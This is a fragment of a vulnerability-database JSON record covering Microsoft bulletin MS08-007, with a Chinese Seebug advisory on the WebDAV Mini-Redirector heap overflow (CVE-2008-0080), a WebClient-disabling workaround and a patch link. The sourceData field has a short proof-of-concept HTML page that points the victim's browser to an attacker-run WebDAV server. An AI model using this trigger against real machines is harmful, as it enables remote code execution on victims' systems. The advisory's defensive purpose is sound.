do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (February 12, 2008): Bulletin published.", "edition": 1, "modified": "2008-02-12T00:00:00", "published": "2008-02-12T00:00:00", "id": "SECURITYVULNS:DOC:19091", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19091", "title": "Microsoft Security Bulletin MS08-007 \u2013 Critical Vulnerability in WebDAV Mini-Redirector Could Allow Remote Code Execution (946026)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:47:37", "description": "BUGTRAQ ID: 27670\r\nCVE(CAN) ID: CVE-2008-0080\r\n\r\nMicrosoft Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nWindows\u7cfb\u7edf\u7684WebDAV\u5ba2\u6237\u7aef\u7a0b\u5e8f\u5b9e\u73b0\u4e0a\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u901a\u8fc7\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\u6076\u610f\u670d\u52a1\u5668\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\nWindows\u7cfb\u7edf\u4e2d\u6240\u5b89\u88c5\u7684WebDAV Mini-Redirector\uff08\u4e5f\u88ab\u79f0\u4e3aWeb\u5ba2\u6237\u7aef\u670d\u52a1\uff0cmrxdav.sys\uff09\u5728\u5904\u7406WebDAV\u54cd\u5e94\u4e2d\u8d85\u8fc765536\u5b57\u8282\u7684\u8d85\u957f\u8def\u5f84\u540d\u65f6\u5b58\u5728\u5806\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5982\u679c\u7528\u6237\u5728IE\u4e2d\u67e5\u770b\u4e86HTML\u9875\u9762\u6216\u8bbf\u95ee\u4e86DAV\u8d44\u6e90\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\u3002\u6210\u529f\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u8981\u6c42\u653b\u51fb\u8005\u521b\u5efa\u4e86\u5b89\u88c5\u6709\u7279\u5236mod_dav\u7ec4\u4ef6\u7684Apache Web\u670d\u52a1\u5668\u3002\u5f53\u7528\u6237\u53d7\u9a97\u8bbf\u95ee\u8be5\u670d\u52a1\u5668\u5e76\u63a5\u53d7\u4e86\u8d85\u957f\u54cd\u5e94\u65f6\uff0c\u5c31\u4f1a\u5bfc\u81f4\u5728\u7528\u6237\u673a\u5668\u4e0a\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\n\n\nMicrosoft Windows XP SP2\r\nMicrosoft Windows Vista\r\nMicrosoft Windows Server 2003 SP2\r\nMicrosoft Windows Server 2003 SP1\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u7528Web\u5ba2\u6237\u7aef\u670d\u52a1\uff1a\r\n \r\n1. \u70b9\u51fb\u201c\u5f00\u59cb\u201d\u3001\u201c\u8fd0\u884c\u201d\uff0c\u952e\u5165Services.msc\uff0c\u7136\u540e\u70b9\u51fb\u201c\u786e\u5b9a\u201d\r\n2. \u53f3\u51fbWebClient\u670d\u52a1\u7136\u540e\u9009\u62e9\u201c\u5c5e\u6027\u201d\r\n3. \u5c06\u542f\u52a8\u7c7b\u578b\u66f4\u6539\u4e3a\u201c\u7981\u7528\u201d\u3002\u5982\u679c\u670d\u52a1\u4ecd\u5728\u8fd0\u884c\uff0c\u70b9\u51fb\u201c\u505c\u6b62\u201d\r\n4. \u70b9\u51fb\u201c\u786e\u5b9a\u201d\u7136\u540e\u9000\u51fa\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS08-007\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS08-007\uff1aVulnerability in WebDAV Mini-Redirector Could Allow Remote Code Execution (946026)\r\n\u94fe\u63a5\uff1a<a href=http://www.microsoft.com/technet/security/Bulletin/MS08-007.mspx?pf=true target=_blank>http://www.microsoft.com/technet/security/Bulletin/MS08-007.mspx?pf=true</a>", "published": "2008-02-20T00:00:00", "title": "Microsoft Windows WebDAV Mini-Redirector\u8fdc\u7a0b\u5806\u6ea2\u51fa\u6f0f\u6d1e\uff08MS08-007\uff09", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0080"], "modified": "2008-02-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2904", "id": "SSV:2904", "sourceData": "\n <html>\r\n<body>\r\n<style>\r\n.httpFolder {behavior: url(#default#httpFolder);}\r\n</style>\r\n<DIV id="oDAV" CLASS="httpFolder" />\r\n<script>\r\noDAV.navigateFrame("http://ApacheServer/dav/d1","_self");\r\n</script>\r\n</body>\r\n</html>\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-2904"}]}